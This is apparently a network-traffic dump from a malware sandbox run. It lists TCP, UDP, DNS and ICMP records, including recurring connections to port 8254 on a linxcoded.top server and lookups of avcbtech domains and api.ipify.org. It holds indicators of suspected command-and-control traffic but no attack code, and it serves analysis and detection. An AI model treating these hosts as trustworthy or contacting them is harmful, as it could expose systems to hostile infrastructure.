Mar 17, 2025 22:35:53.766072989 CET	60842	8254	192.168.2.24	185.174.100.76
Mar 17, 2025 22:35:53.770852089 CET	8254	60842	185.174.100.76	192.168.2.24
Mar 17, 2025 22:35:56.681118965 CET	60865	443	192.168.2.24	142.250.184.196
Mar 17, 2025 22:35:56.681158066 CET	443	60865	142.250.184.196	192.168.2.24
Mar 17, 2025 22:35:56.681256056 CET	60865	443	192.168.2.24	142.250.184.196
Mar 17, 2025 22:35:56.681526899 CET	60865	443	192.168.2.24	142.250.184.196
Mar 17, 2025 22:35:56.681538105 CET	443	60865	142.250.184.196	192.168.2.24
Mar 17, 2025 22:35:57.591082096 CET	443	60865	142.250.184.196	192.168.2.24
Mar 17, 2025 22:35:57.591381073 CET	60865	443	192.168.2.24	142.250.184.196
Mar 17, 2025 22:35:57.591392994 CET	443	60865	142.250.184.196	192.168.2.24
Mar 17, 2025 22:35:57.649024010 CET	63134	53	192.168.2.24	1.1.1.1
Mar 17, 2025 22:35:57.653719902 CET	53	63134	1.1.1.1	192.168.2.24
Mar 17, 2025 22:35:57.653810024 CET	63134	53	192.168.2.24	1.1.1.1
Mar 17, 2025 22:35:57.653881073 CET	63134	53	192.168.2.24	1.1.1.1
Mar 17, 2025 22:35:57.658684969 CET	53	63134	1.1.1.1	192.168.2.24
Mar 17, 2025 22:35:58.098376989 CET	53	63134	1.1.1.1	192.168.2.24
Mar 17, 2025 22:35:58.100852966 CET	63134	53	192.168.2.24	1.1.1.1
Mar 17, 2025 22:35:58.105714083 CET	53	63134	1.1.1.1	192.168.2.24
Mar 17, 2025 22:35:58.105771065 CET	63134	53	192.168.2.24	1.1.1.1
Mar 17, 2025 22:36:01.755218029 CET	443	60855	104.168.138.190	192.168.2.24
Mar 17, 2025 22:36:01.755309105 CET	443	60855	104.168.138.190	192.168.2.24
Mar 17, 2025 22:36:01.755397081 CET	60855	443	192.168.2.24	104.168.138.190
Mar 17, 2025 22:36:01.758836985 CET	60855	443	192.168.2.24	104.168.138.190
Mar 17, 2025 22:36:01.758869886 CET	443	60855	104.168.138.190	192.168.2.24
Mar 17, 2025 22:36:01.794836998 CET	63137	443	192.168.2.24	104.168.138.190
Mar 17, 2025 22:36:01.794904947 CET	443	63137	104.168.138.190	192.168.2.24
Mar 17, 2025 22:36:01.795006037 CET	63137	443	192.168.2.24	104.168.138.190
Mar 17, 2025 22:36:01.795147896 CET	63137	443	192.168.2.24	104.168.138.190
Mar 17, 2025 22:36:01.795166016 CET	443	63137	104.168.138.190	192.168.2.24
Mar 17, 2025 22:36:02.280859947 CET	60845	8254	192.168.2.24	185.174.100.76
Mar 17, 2025 22:36:02.285624027 CET	8254	60845	185.174.100.76	192.168.2.24
Mar 17, 2025 22:36:02.397298098 CET	443	63137	104.168.138.190	192.168.2.24
Mar 17, 2025 22:36:02.397680998 CET	63137	443	192.168.2.24	104.168.138.190
Mar 17, 2025 22:36:02.397706032 CET	443	63137	104.168.138.190	192.168.2.24
Mar 17, 2025 22:36:02.397885084 CET	63137	443	192.168.2.24	104.168.138.190
Mar 17, 2025 22:36:02.397891045 CET	443	63137	104.168.138.190	192.168.2.24
Mar 17, 2025 22:36:02.839454889 CET	443	63137	104.168.138.190	192.168.2.24
Mar 17, 2025 22:36:02.839535952 CET	443	63137	104.168.138.190	192.168.2.24
Mar 17, 2025 22:36:02.839608908 CET	63137	443	192.168.2.24	104.168.138.190
Mar 17, 2025 22:36:02.840894938 CET	63137	443	192.168.2.24	104.168.138.190
Mar 17, 2025 22:36:02.840913057 CET	443	63137	104.168.138.190	192.168.2.24
Mar 17, 2025 22:36:07.506140947 CET	443	60865	142.250.184.196	192.168.2.24
Mar 17, 2025 22:36:07.506205082 CET	443	60865	142.250.184.196	192.168.2.24
Mar 17, 2025 22:36:07.506386042 CET	60865	443	192.168.2.24	142.250.184.196
Mar 17, 2025 22:36:08.569544077 CET	60865	443	192.168.2.24	142.250.184.196
Mar 17, 2025 22:36:08.569566965 CET	443	60865	142.250.184.196	192.168.2.24
Mar 17, 2025 22:36:26.250149012 CET	60851	8254	192.168.2.24	185.174.100.76
Mar 17, 2025 22:36:26.255467892 CET	8254	60851	185.174.100.76	192.168.2.24
Mar 17, 2025 22:36:30.991318941 CET	63143	443	192.168.2.24	104.168.138.190
Mar 17, 2025 22:36:30.991369009 CET	443	63143	104.168.138.190	192.168.2.24
Mar 17, 2025 22:36:30.991446018 CET	63143	443	192.168.2.24	104.168.138.190
Mar 17, 2025 22:36:30.992156982 CET	63144	8254	192.168.2.24	185.174.100.76
Mar 17, 2025 22:36:30.992618084 CET	63143	443	192.168.2.24	104.168.138.190
Mar 17, 2025 22:36:30.992629051 CET	443	63143	104.168.138.190	192.168.2.24
Mar 17, 2025 22:36:30.996959925 CET	8254	63144	185.174.100.76	192.168.2.24
Mar 17, 2025 22:36:30.997040033 CET	63144	8254	192.168.2.24	185.174.100.76
Mar 17, 2025 22:36:30.997334957 CET	63144	8254	192.168.2.24	185.174.100.76
Mar 17, 2025 22:36:31.001965046 CET	8254	63144	185.174.100.76	192.168.2.24
Mar 17, 2025 22:36:31.597202063 CET	443	63143	104.168.138.190	192.168.2.24
Mar 17, 2025 22:36:31.597599030 CET	63143	443	192.168.2.24	104.168.138.190
Mar 17, 2025 22:36:31.597609997 CET	443	63143	104.168.138.190	192.168.2.24
Mar 17, 2025 22:36:31.597826958 CET	63143	443	192.168.2.24	104.168.138.190
Mar 17, 2025 22:36:31.597831964 CET	443	63143	104.168.138.190	192.168.2.24
Mar 17, 2025 22:36:31.610917091 CET	8254	63144	185.174.100.76	192.168.2.24
Mar 17, 2025 22:36:31.611148119 CET	63144	8254	192.168.2.24	185.174.100.76
Mar 17, 2025 22:36:31.611346006 CET	63144	8254	192.168.2.24	185.174.100.76
Mar 17, 2025 22:36:31.616122007 CET	8254	63144	185.174.100.76	192.168.2.24
Mar 17, 2025 22:36:31.616421938 CET	8254	63144	185.174.100.76	192.168.2.24
Mar 17, 2025 22:36:31.895004034 CET	8254	63144	185.174.100.76	192.168.2.24
Mar 17, 2025 22:36:31.898801088 CET	63145	443	192.168.2.24	104.26.13.205
Mar 17, 2025 22:36:31.898842096 CET	443	63145	104.26.13.205	192.168.2.24
Mar 17, 2025 22:36:31.898911953 CET	63145	443	192.168.2.24	104.26.13.205
Mar 17, 2025 22:36:31.899126053 CET	63145	443	192.168.2.24	104.26.13.205
Mar 17, 2025 22:36:31.899142981 CET	443	63145	104.26.13.205	192.168.2.24
Mar 17, 2025 22:36:31.939047098 CET	63144	8254	192.168.2.24	185.174.100.76
Mar 17, 2025 22:36:32.007921934 CET	443	63143	104.168.138.190	192.168.2.24
Mar 17, 2025 22:36:32.008002043 CET	443	63143	104.168.138.190	192.168.2.24
Mar 17, 2025 22:36:32.008117914 CET	63143	443	192.168.2.24	104.168.138.190
Mar 17, 2025 22:36:32.008821011 CET	63143	443	192.168.2.24	104.168.138.190
Mar 17, 2025 22:36:32.008843899 CET	443	63143	104.168.138.190	192.168.2.24
Mar 17, 2025 22:36:32.013000011 CET	63146	443	192.168.2.24	104.168.138.190
Mar 17, 2025 22:36:32.013036966 CET	443	63146	104.168.138.190	192.168.2.24
Mar 17, 2025 22:36:32.013104916 CET	63146	443	192.168.2.24	104.168.138.190
Mar 17, 2025 22:36:32.015260935 CET	63146	443	192.168.2.24	104.168.138.190
Mar 17, 2025 22:36:32.015269995 CET	443	63146	104.168.138.190	192.168.2.24
Mar 17, 2025 22:36:32.358655930 CET	443	63145	104.26.13.205	192.168.2.24
Mar 17, 2025 22:36:32.359132051 CET	63145	443	192.168.2.24	104.26.13.205
Mar 17, 2025 22:36:32.359173059 CET	443	63145	104.26.13.205	192.168.2.24
Mar 17, 2025 22:36:32.359332085 CET	63145	443	192.168.2.24	104.26.13.205
Mar 17, 2025 22:36:32.359338999 CET	443	63145	104.26.13.205	192.168.2.24
Mar 17, 2025 22:36:32.480084896 CET	443	63145	104.26.13.205	192.168.2.24
Mar 17, 2025 22:36:32.480138063 CET	443	63145	104.26.13.205	192.168.2.24
Mar 17, 2025 22:36:32.480267048 CET	63145	443	192.168.2.24	104.26.13.205
Mar 17, 2025 22:36:32.515078068 CET	63145	443	192.168.2.24	104.26.13.205
Mar 17, 2025 22:36:32.515098095 CET	443	63145	104.26.13.205	192.168.2.24
Mar 17, 2025 22:36:32.517096043 CET	63144	8254	192.168.2.24	185.174.100.76
Mar 17, 2025 22:36:32.521846056 CET	8254	63144	185.174.100.76	192.168.2.24
Mar 17, 2025 22:36:32.572448015 CET	63147	443	192.168.2.24	104.26.12.205
Mar 17, 2025 22:36:32.572491884 CET	443	63147	104.26.12.205	192.168.2.24
Mar 17, 2025 22:36:32.572555065 CET	63147	443	192.168.2.24	104.26.12.205
Mar 17, 2025 22:36:32.572683096 CET	63147	443	192.168.2.24	104.26.12.205
Mar 17, 2025 22:36:32.572695971 CET	443	63147	104.26.12.205	192.168.2.24
Mar 17, 2025 22:36:32.604582071 CET	443	63146	104.168.138.190	192.168.2.24
Mar 17, 2025 22:36:32.604907036 CET	63146	443	192.168.2.24	104.168.138.190
Mar 17, 2025 22:36:32.604928970 CET	443	63146	104.168.138.190	192.168.2.24
Mar 17, 2025 22:36:32.605129004 CET	63146	443	192.168.2.24	104.168.138.190
Mar 17, 2025 22:36:32.605133057 CET	443	63146	104.168.138.190	192.168.2.24
Mar 17, 2025 22:36:33.018146992 CET	443	63146	104.168.138.190	192.168.2.24
Mar 17, 2025 22:36:33.018604994 CET	443	63146	104.168.138.190	192.168.2.24
Mar 17, 2025 22:36:33.018661022 CET	63146	443	192.168.2.24	104.168.138.190
Mar 17, 2025 22:36:33.019514084 CET	63146	443	192.168.2.24	104.168.138.190
Mar 17, 2025 22:36:33.019529104 CET	443	63146	104.168.138.190	192.168.2.24
Mar 17, 2025 22:36:33.053814888 CET	443	63147	104.26.12.205	192.168.2.24
Mar 17, 2025 22:36:33.054271936 CET	63147	443	192.168.2.24	104.26.12.205
Mar 17, 2025 22:36:33.054299116 CET	443	63147	104.26.12.205	192.168.2.24
Mar 17, 2025 22:36:33.054474115 CET	63147	443	192.168.2.24	104.26.12.205
Mar 17, 2025 22:36:33.054480076 CET	443	63147	104.26.12.205	192.168.2.24
Mar 17, 2025 22:36:33.211324930 CET	443	63147	104.26.12.205	192.168.2.24
Mar 17, 2025 22:36:33.211373091 CET	443	63147	104.26.12.205	192.168.2.24
Mar 17, 2025 22:36:33.211451054 CET	63147	443	192.168.2.24	104.26.12.205
Mar 17, 2025 22:36:33.212726116 CET	63147	443	192.168.2.24	104.26.12.205
Mar 17, 2025 22:36:33.212743044 CET	443	63147	104.26.12.205	192.168.2.24
Mar 17, 2025 22:36:35.015341043 CET	60856	8254	192.168.2.24	185.174.100.76
Mar 17, 2025 22:36:35.020143032 CET	8254	60856	185.174.100.76	192.168.2.24
Mar 17, 2025 22:36:38.781438112 CET	60842	8254	192.168.2.24	185.174.100.76
Mar 17, 2025 22:36:38.786169052 CET	8254	60842	185.174.100.76	192.168.2.24
Mar 17, 2025 22:36:47.297434092 CET	60845	8254	192.168.2.24	185.174.100.76
Mar 17, 2025 22:36:47.302213907 CET	8254	60845	185.174.100.76	192.168.2.24
Mar 17, 2025 22:36:56.689877987 CET	63148	443	192.168.2.24	142.250.184.196
Mar 17, 2025 22:36:56.689941883 CET	443	63148	142.250.184.196	192.168.2.24
Mar 17, 2025 22:36:56.690181017 CET	63148	443	192.168.2.24	142.250.184.196
Mar 17, 2025 22:36:56.690357924 CET	63148	443	192.168.2.24	142.250.184.196
Mar 17, 2025 22:36:56.690380096 CET	443	63148	142.250.184.196	192.168.2.24
Mar 17, 2025 22:36:57.321310997 CET	443	63148	142.250.184.196	192.168.2.24
Mar 17, 2025 22:36:57.321734905 CET	63148	443	192.168.2.24	142.250.184.196
Mar 17, 2025 22:36:57.321762085 CET	443	63148	142.250.184.196	192.168.2.24
Mar 17, 2025 22:37:06.236007929 CET	443	60817	2.19.122.66	192.168.2.24
Mar 17, 2025 22:37:06.236114979 CET	443	60817	2.19.122.66	192.168.2.24
Mar 17, 2025 22:37:06.236120939 CET	60817	443	192.168.2.24	2.19.122.66
Mar 17, 2025 22:37:06.236171007 CET	60817	443	192.168.2.24	2.19.122.66
Mar 17, 2025 22:37:06.236284971 CET	60817	443	192.168.2.24	2.19.122.66
Mar 17, 2025 22:37:06.240998030 CET	443	60817	2.19.122.66	192.168.2.24
Mar 17, 2025 22:37:07.230321884 CET	443	63148	142.250.184.196	192.168.2.24
Mar 17, 2025 22:37:07.230398893 CET	443	63148	142.250.184.196	192.168.2.24
Mar 17, 2025 22:37:07.230565071 CET	63148	443	192.168.2.24	142.250.184.196
Mar 17, 2025 22:37:08.564323902 CET	63148	443	192.168.2.24	142.250.184.196
Mar 17, 2025 22:37:08.564356089 CET	443	63148	142.250.184.196	192.168.2.24
Mar 17, 2025 22:37:11.266619921 CET	60851	8254	192.168.2.24	185.174.100.76
Mar 17, 2025 22:37:11.271395922 CET	8254	60851	185.174.100.76	192.168.2.24
Mar 17, 2025 22:37:17.531723976 CET	63144	8254	192.168.2.24	185.174.100.76
Mar 17, 2025 22:37:17.539048910 CET	8254	63144	185.174.100.76	192.168.2.24
Mar 17, 2025 22:37:20.031702995 CET	60856	8254	192.168.2.24	185.174.100.76
Mar 17, 2025 22:37:20.036498070 CET	8254	60856	185.174.100.76	192.168.2.24
Mar 17, 2025 22:37:23.796868086 CET	60842	8254	192.168.2.24	185.174.100.76
Mar 17, 2025 22:37:23.801515102 CET	8254	60842	185.174.100.76	192.168.2.24
Mar 17, 2025 22:37:32.313046932 CET	60845	8254	192.168.2.24	185.174.100.76
Mar 17, 2025 22:37:32.318084955 CET	8254	60845	185.174.100.76	192.168.2.24
Mar 17, 2025 22:37:56.281745911 CET	60851	8254	192.168.2.24	185.174.100.76
Mar 17, 2025 22:37:56.286659002 CET	8254	60851	185.174.100.76	192.168.2.24
Mar 17, 2025 22:38:02.546986103 CET	63144	8254	192.168.2.24	185.174.100.76
Mar 17, 2025 22:38:02.551693916 CET	8254	63144	185.174.100.76	192.168.2.24
Mar 17, 2025 22:38:05.046698093 CET	60856	8254	192.168.2.24	185.174.100.76
Mar 17, 2025 22:38:05.051542997 CET	8254	60856	185.174.100.76	192.168.2.24
Mar 17, 2025 22:38:08.812268972 CET	60842	8254	192.168.2.24	185.174.100.76
Mar 17, 2025 22:38:08.817789078 CET	8254	60842	185.174.100.76	192.168.2.24

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 17, 2025 22:34:52.365336895 CET	53	53556	1.1.1.1	192.168.2.24
Mar 17, 2025 22:34:52.393379927 CET	53	49627	1.1.1.1	192.168.2.24
Mar 17, 2025 22:34:53.996268988 CET	53	61046	1.1.1.1	192.168.2.24
Mar 17, 2025 22:34:56.564951897 CET	58807	53	192.168.2.24	1.1.1.1
Mar 17, 2025 22:34:56.565109968 CET	56929	53	192.168.2.24	1.1.1.1
Mar 17, 2025 22:34:56.571630001 CET	53	58807	1.1.1.1	192.168.2.24
Mar 17, 2025 22:34:56.571753979 CET	53	56929	1.1.1.1	192.168.2.24
Mar 17, 2025 22:34:57.664673090 CET	50826	53	192.168.2.24	1.1.1.1
Mar 17, 2025 22:34:57.664815903 CET	51782	53	192.168.2.24	1.1.1.1
Mar 17, 2025 22:34:57.692930937 CET	53	51782	1.1.1.1	192.168.2.24
Mar 17, 2025 22:34:57.708226919 CET	53	50826	1.1.1.1	192.168.2.24
Mar 17, 2025 22:34:59.034363985 CET	62445	53	192.168.2.24	1.1.1.1
Mar 17, 2025 22:34:59.034517050 CET	53451	53	192.168.2.24	1.1.1.1
Mar 17, 2025 22:34:59.637190104 CET	53	53451	1.1.1.1	192.168.2.24
Mar 17, 2025 22:34:59.637327909 CET	53	62445	1.1.1.1	192.168.2.24
Mar 17, 2025 22:35:01.052311897 CET	53	51802	1.1.1.1	192.168.2.24
Mar 17, 2025 22:35:02.237812996 CET	51645	53	192.168.2.24	1.1.1.1
Mar 17, 2025 22:35:02.238024950 CET	52306	53	192.168.2.24	1.1.1.1
Mar 17, 2025 22:35:02.244399071 CET	53	51645	1.1.1.1	192.168.2.24
Mar 17, 2025 22:35:02.244803905 CET	53	52306	1.1.1.1	192.168.2.24
Mar 17, 2025 22:35:03.074246883 CET	61334	53	192.168.2.24	1.1.1.1
Mar 17, 2025 22:35:03.074413061 CET	56396	53	192.168.2.24	1.1.1.1
Mar 17, 2025 22:35:03.081607103 CET	53	61334	1.1.1.1	192.168.2.24
Mar 17, 2025 22:35:03.081784010 CET	53	56396	1.1.1.1	192.168.2.24
Mar 17, 2025 22:35:03.817198992 CET	50864	53	192.168.2.24	1.1.1.1
Mar 17, 2025 22:35:03.817369938 CET	52860	53	192.168.2.24	1.1.1.1
Mar 17, 2025 22:35:03.825078964 CET	53	50864	1.1.1.1	192.168.2.24
Mar 17, 2025 22:35:03.865601063 CET	53	52860	1.1.1.1	192.168.2.24
Mar 17, 2025 22:35:07.142565012 CET	52909	53	192.168.2.24	1.1.1.1
Mar 17, 2025 22:35:07.142817974 CET	63610	53	192.168.2.24	1.1.1.1
Mar 17, 2025 22:35:07.175633907 CET	53	52909	1.1.1.1	192.168.2.24
Mar 17, 2025 22:35:07.177902937 CET	53	63610	1.1.1.1	192.168.2.24
Mar 17, 2025 22:35:08.090181112 CET	58109	53	192.168.2.24	1.1.1.1
Mar 17, 2025 22:35:08.090352058 CET	64041	53	192.168.2.24	1.1.1.1
Mar 17, 2025 22:35:08.097048998 CET	53	58109	1.1.1.1	192.168.2.24
Mar 17, 2025 22:35:08.098330021 CET	53	64041	1.1.1.1	192.168.2.24
Mar 17, 2025 22:35:08.769486904 CET	65073	53	192.168.2.24	1.1.1.1
Mar 17, 2025 22:35:08.769659996 CET	62742	53	192.168.2.24	1.1.1.1
Mar 17, 2025 22:35:08.777338982 CET	53	65073	1.1.1.1	192.168.2.24
Mar 17, 2025 22:35:08.777915001 CET	53	62742	1.1.1.1	192.168.2.24
Mar 17, 2025 22:35:11.033871889 CET	137	137	192.168.2.24	192.168.2.255
Mar 17, 2025 22:35:11.074206114 CET	53	61134	1.1.1.1	192.168.2.24
Mar 17, 2025 22:35:11.797178984 CET	137	137	192.168.2.24	192.168.2.255
Mar 17, 2025 22:35:12.547225952 CET	137	137	192.168.2.24	192.168.2.255
Mar 17, 2025 22:35:15.725852013 CET	52692	53	192.168.2.24	1.1.1.1
Mar 17, 2025 22:35:15.727080107 CET	51419	53	192.168.2.24	1.1.1.1
Mar 17, 2025 22:35:16.016443968 CET	53	51419	1.1.1.1	192.168.2.24
Mar 17, 2025 22:35:16.020397902 CET	53	52692	1.1.1.1	192.168.2.24
Mar 17, 2025 22:35:29.383812904 CET	62403	53	192.168.2.24	1.1.1.1
Mar 17, 2025 22:35:29.383972883 CET	53476	53	192.168.2.24	1.1.1.1
Mar 17, 2025 22:35:29.918817997 CET	53	53476	1.1.1.1	192.168.2.24
Mar 17, 2025 22:35:29.919051886 CET	53	62403	1.1.1.1	192.168.2.24
Mar 17, 2025 22:35:30.008563042 CET	53	52656	1.1.1.1	192.168.2.24
Mar 17, 2025 22:35:51.950139046 CET	53	59299	1.1.1.1	192.168.2.24
Mar 17, 2025 22:35:52.603055954 CET	53	54353	1.1.1.1	192.168.2.24
Mar 17, 2025 22:35:55.284888029 CET	53	54711	1.1.1.1	192.168.2.24
Mar 17, 2025 22:35:56.625801086 CET	50986	53	192.168.2.24	1.1.1.1
Mar 17, 2025 22:35:56.625955105 CET	55088	53	192.168.2.24	1.1.1.1
Mar 17, 2025 22:35:56.680078030 CET	53	50986	1.1.1.1	192.168.2.24
Mar 17, 2025 22:35:56.680088997 CET	53	55088	1.1.1.1	192.168.2.24
Mar 17, 2025 22:35:57.648592949 CET	53	59444	1.1.1.1	192.168.2.24
Mar 17, 2025 22:36:32.565200090 CET	56012	53	192.168.2.24	1.1.1.1
Mar 17, 2025 22:36:32.565360069 CET	51417	53	192.168.2.24	1.1.1.1
Mar 17, 2025 22:36:32.571908951 CET	53	56012	1.1.1.1	192.168.2.24
Mar 17, 2025 22:36:32.572048903 CET	53	51417	1.1.1.1	192.168.2.24
Mar 17, 2025 22:37:01.852230072 CET	138	138	192.168.2.24	192.168.2.255

ICMP Packets

Timestamp	Source IP	Dest IP	Checksum	Code	Type
Mar 17, 2025 22:35:03.865662098 CET	192.168.2.24	1.1.1.1	c256	(Port unreachable)	Destination Unreachable

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Mar 17, 2025 22:34:56.564951897 CET	192.168.2.24	1.1.1.1	0x62b4	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Mar 17, 2025 22:34:56.565109968 CET	192.168.2.24	1.1.1.1	0x7479	Standard query (0)	www.google.com	65	IN (0x0001)	false
Mar 17, 2025 22:34:57.664673090 CET	192.168.2.24	1.1.1.1	0xe850	Standard query (0)	office.avcbtech.store	A (IP address)	IN (0x0001)	false
Mar 17, 2025 22:34:57.664815903 CET	192.168.2.24	1.1.1.1	0xb70	Standard query (0)	office.avcbtech.store	65	IN (0x0001)	false
Mar 17, 2025 22:34:59.034363985 CET	192.168.2.24	1.1.1.1	0xc2be	Standard query (0)	sender.linxcoded.top	A (IP address)	IN (0x0001)	false
Mar 17, 2025 22:34:59.034517050 CET	192.168.2.24	1.1.1.1	0xc6aa	Standard query (0)	sender.linxcoded.top	65	IN (0x0001)	false
Mar 17, 2025 22:35:02.237812996 CET	192.168.2.24	1.1.1.1	0xe4b8	Standard query (0)	code.jquery.com	A (IP address)	IN (0x0001)	false
Mar 17, 2025 22:35:02.238024950 CET	192.168.2.24	1.1.1.1	0x797d	Standard query (0)	code.jquery.com	65	IN (0x0001)	false
Mar 17, 2025 22:35:03.074246883 CET	192.168.2.24	1.1.1.1	0x6db6	Standard query (0)	i.imgur.com	A (IP address)	IN (0x0001)	false
Mar 17, 2025 22:35:03.074413061 CET	192.168.2.24	1.1.1.1	0x33ce	Standard query (0)	i.imgur.com	65	IN (0x0001)	false
Mar 17, 2025 22:35:03.817198992 CET	192.168.2.24	1.1.1.1	0x3626	Standard query (0)	i.imgur.com	A (IP address)	IN (0x0001)	false
Mar 17, 2025 22:35:03.817369938 CET	192.168.2.24	1.1.1.1	0xa5ec	Standard query (0)	i.imgur.com	65	IN (0x0001)	false
Mar 17, 2025 22:35:07.142565012 CET	192.168.2.24	1.1.1.1	0x70cb	Standard query (0)	server1.linxcoded.top	A (IP address)	IN (0x0001)	false
Mar 17, 2025 22:35:07.142817974 CET	192.168.2.24	1.1.1.1	0x92db	Standard query (0)	_8254._https.server1.linxcoded.top	65	IN (0x0001)	false
Mar 17, 2025 22:35:08.090181112 CET	192.168.2.24	1.1.1.1	0xed71	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)	false
Mar 17, 2025 22:35:08.090352058 CET	192.168.2.24	1.1.1.1	0xb12a	Standard query (0)	api.ipify.org	65	IN (0x0001)	false
Mar 17, 2025 22:35:08.769486904 CET	192.168.2.24	1.1.1.1	0xbb90	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)	false
Mar 17, 2025 22:35:08.769659996 CET	192.168.2.24	1.1.1.1	0x82b	Standard query (0)	api.ipify.org	65	IN (0x0001)	false
Mar 17, 2025 22:35:15.725852013 CET	192.168.2.24	1.1.1.1	0x337c	Standard query (0)	avcbtech.site	A (IP address)	IN (0x0001)	false
Mar 17, 2025 22:35:15.727080107 CET	192.168.2.24	1.1.1.1	0x4558	Standard query (0)	avcbtech.site	65	IN (0x0001)	false
Mar 17, 2025 22:35:29.383812904 CET	192.168.2.24	1.1.1.1	0xe3e6	Standard query (0)	avcbtech.site	A (IP address)	IN (0x0001)	false
Mar 17, 2025 22:35:29.383972883 CET	192.168.2.24	1.1.1.1	0x5127	Standard query (0)	avcbtech.site	65	IN (0x0001)	false
Mar 17, 2025 22:35:56.625801086 CET	192.168.2.24	1.1.1.1	0x5357	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Mar 17, 2025 22:35:56.625955105 CET	192.168.2.24	1.1.1.1	0xfdd2	Standard query (0)	www.google.com	65	IN (0x0001)	false
Mar 17, 2025 22:36:32.565200090 CET	192.168.2.24	1.1.1.1	0x728d	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)	false
Mar 17, 2025 22:36:32.565360069 CET	192.168.2.24	1.1.1.1	0xe47b	Standard query (0)	api.ipify.org	65	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Mar 17, 2025 22:34:56.571630001 CET	1.1.1.1	192.168.2.24	0x62b4	No error (0)	www.google.com		142.250.186.132	A (IP address)	IN (0x0001)	false
Mar 17, 2025 22:34:56.571753979 CET	1.1.1.1	192.168.2.24	0x7479	No error (0)	www.google.com			65	IN (0x0001)	false
Mar 17, 2025 22:34:57.708226919 CET	1.1.1.1	192.168.2.24	0xe850	No error (0)	office.avcbtech.store		139.28.36.38	A (IP address)	IN (0x0001)	false
Mar 17, 2025 22:34:59.637327909 CET	1.1.1.1	192.168.2.24	0xc2be	No error (0)	sender.linxcoded.top		185.174.100.20	A (IP address)	IN (0x0001)	false
Mar 17, 2025 22:35:02.244399071 CET	1.1.1.1	192.168.2.24	0xe4b8	No error (0)	code.jquery.com		151.101.194.137	A (IP address)	IN (0x0001)	false
Mar 17, 2025 22:35:02.244399071 CET	1.1.1.1	192.168.2.24	0xe4b8	No error (0)	code.jquery.com		151.101.130.137	A (IP address)	IN (0x0001)	false
Mar 17, 2025 22:35:02.244399071 CET	1.1.1.1	192.168.2.24	0xe4b8	No error (0)	code.jquery.com		151.101.2.137	A (IP address)	IN (0x0001)	false
Mar 17, 2025 22:35:02.244399071 CET	1.1.1.1	192.168.2.24	0xe4b8	No error (0)	code.jquery.com		151.101.66.137	A (IP address)	IN (0x0001)	false
Mar 17, 2025 22:35:03.081607103 CET	1.1.1.1	192.168.2.24	0x6db6	No error (0)	i.imgur.com	ipv4.imgur.map.fastly.net		CNAME (Canonical name)	IN (0x0001)	false
Mar 17, 2025 22:35:03.081607103 CET	1.1.1.1	192.168.2.24	0x6db6	No error (0)	ipv4.imgur.map.fastly.net		199.232.196.193	A (IP address)	IN (0x0001)	false
Mar 17, 2025 22:35:03.081607103 CET	1.1.1.1	192.168.2.24	0x6db6	No error (0)	ipv4.imgur.map.fastly.net		199.232.192.193	A (IP address)	IN (0x0001)	false
Mar 17, 2025 22:35:03.081773996 CET	1.1.1.1	192.168.2.24	0xa389	No error (0)	shed.dual-low.s-part-0039.t-0009.t-msedge.net	s-part-0039.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Mar 17, 2025 22:35:03.081773996 CET	1.1.1.1	192.168.2.24	0xa389	No error (0)	s-part-0039.t-0009.t-msedge.net		13.107.246.67	A (IP address)	IN (0x0001)	false
Mar 17, 2025 22:35:03.081784010 CET	1.1.1.1	192.168.2.24	0x33ce	No error (0)	i.imgur.com	ipv4.imgur.map.fastly.net		CNAME (Canonical name)	IN (0x0001)	false
Mar 17, 2025 22:35:03.825078964 CET	1.1.1.1	192.168.2.24	0x3626	No error (0)	i.imgur.com	ipv4.imgur.map.fastly.net		CNAME (Canonical name)	IN (0x0001)	false
Mar 17, 2025 22:35:03.825078964 CET	1.1.1.1	192.168.2.24	0x3626	No error (0)	ipv4.imgur.map.fastly.net		199.232.192.193	A (IP address)	IN (0x0001)	false
Mar 17, 2025 22:35:03.825078964 CET	1.1.1.1	192.168.2.24	0x3626	No error (0)	ipv4.imgur.map.fastly.net		199.232.196.193	A (IP address)	IN (0x0001)	false
Mar 17, 2025 22:35:03.865601063 CET	1.1.1.1	192.168.2.24	0xa5ec	No error (0)	i.imgur.com	ipv4.imgur.map.fastly.net		CNAME (Canonical name)	IN (0x0001)	false
Mar 17, 2025 22:35:03.891978025 CET	1.1.1.1	192.168.2.24	0x1c5b	No error (0)	shed.dual-low.s-part-0039.t-0009.t-msedge.net	s-part-0039.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Mar 17, 2025 22:35:03.891978025 CET	1.1.1.1	192.168.2.24	0x1c5b	No error (0)	s-part-0039.t-0009.t-msedge.net		13.107.246.67	A (IP address)	IN (0x0001)	false
Mar 17, 2025 22:35:07.175633907 CET	1.1.1.1	192.168.2.24	0x70cb	No error (0)	server1.linxcoded.top		185.174.100.76	A (IP address)	IN (0x0001)	false
Mar 17, 2025 22:35:07.177902937 CET	1.1.1.1	192.168.2.24	0x92db	Name error (3)	_8254._https.server1.linxcoded.top	none	none	65	IN (0x0001)	false
Mar 17, 2025 22:35:08.097048998 CET	1.1.1.1	192.168.2.24	0xed71	No error (0)	api.ipify.org		104.26.13.205	A (IP address)	IN (0x0001)	false
Mar 17, 2025 22:35:08.097048998 CET	1.1.1.1	192.168.2.24	0xed71	No error (0)	api.ipify.org		104.26.12.205	A (IP address)	IN (0x0001)	false
Mar 17, 2025 22:35:08.097048998 CET	1.1.1.1	192.168.2.24	0xed71	No error (0)	api.ipify.org		172.67.74.152	A (IP address)	IN (0x0001)	false
Mar 17, 2025 22:35:08.098330021 CET	1.1.1.1	192.168.2.24	0xb12a	No error (0)	api.ipify.org			65	IN (0x0001)	false
Mar 17, 2025 22:35:08.777338982 CET	1.1.1.1	192.168.2.24	0xbb90	No error (0)	api.ipify.org		104.26.13.205	A (IP address)	IN (0x0001)	false
Mar 17, 2025 22:35:08.777338982 CET	1.1.1.1	192.168.2.24	0xbb90	No error (0)	api.ipify.org		172.67.74.152	A (IP address)	IN (0x0001)	false
